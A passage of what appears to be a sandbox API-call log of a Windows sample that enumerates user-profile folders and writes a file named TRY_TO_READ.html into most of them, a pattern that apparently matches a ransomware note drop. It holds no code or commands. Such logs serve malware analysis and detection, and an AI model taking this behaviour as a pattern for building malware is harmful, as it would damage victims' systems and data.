lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.390] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.390] GetLastError () returned 0x0 [0117.390] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0117.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0117.390] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.390] GetLastError () returned 0x0 [0117.390] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0117.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d58 | out: hHeap=0x2e0000) returned 1 [0117.390] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.390] GetLastError () returned 0x0 [0117.390] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0117.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d58 | out: hHeap=0x2e0000) returned 1 [0117.390] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.390] GetLastError () returned 0x0 [0117.390] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5b69f6f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5b69f6f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0117.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.390] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.390] GetLastError () returned 0x0 [0117.390] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.391] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.392] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.392] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.392] CloseHandle (hObject=0x464) returned 1 [0117.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360a78 | out: hHeap=0x2e0000) returned 1 [0117.393] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0117.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.393] GetLastError () returned 0x0 [0117.393] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.393] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.394] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.395] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.395] CloseHandle (hObject=0x464) returned 1 [0117.395] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.395] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.395] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.395] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338b68 | out: hHeap=0x2e0000) returned 1 [0117.395] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0117.395] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.395] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.395] GetLastError () returned 0x0 [0117.395] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.396] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.396] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.397] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.397] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.397] CloseHandle (hObject=0x464) returned 1 [0117.398] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.398] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.398] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.398] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360ad0 | out: hHeap=0x2e0000) returned 1 [0117.398] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0117.398] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.398] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.398] GetLastError () returned 0x0 [0117.398] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.398] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.398] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.399] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.399] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.399] CloseHandle (hObject=0x464) returned 1 [0117.400] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.400] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.400] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.400] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338bd0 | out: hHeap=0x2e0000) returned 1 [0117.400] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0117.400] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.400] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.400] GetLastError () returned 0x0 [0117.400] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.401] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.401] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.402] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.402] CloseHandle (hObject=0x464) returned 1 [0117.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360b28 | out: hHeap=0x2e0000) returned 1 [0117.402] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0117.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.402] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.402] GetLastError () returned 0x0 [0117.402] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.404] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.405] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.405] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.405] CloseHandle (hObject=0x464) returned 1 [0117.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360b80 | out: hHeap=0x2e0000) returned 1 [0117.405] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0117.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.406] GetLastError () returned 0x0 [0117.406] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.407] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.408] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.408] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.408] CloseHandle (hObject=0x464) returned 1 [0117.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338c38 | out: hHeap=0x2e0000) returned 1 [0117.408] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0117.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.409] GetLastError () returned 0x0 [0117.409] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.409] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.410] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.410] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.410] CloseHandle (hObject=0x464) returned 1 [0117.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338ca0 | out: hHeap=0x2e0000) returned 1 [0117.411] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x970a00b0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970c6210, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0117.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.411] GetLastError () returned 0x0 [0117.411] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5b594d50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5b594d50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0117.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.411] GetLastError () returned 0x0 [0117.411] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.411] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.412] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, 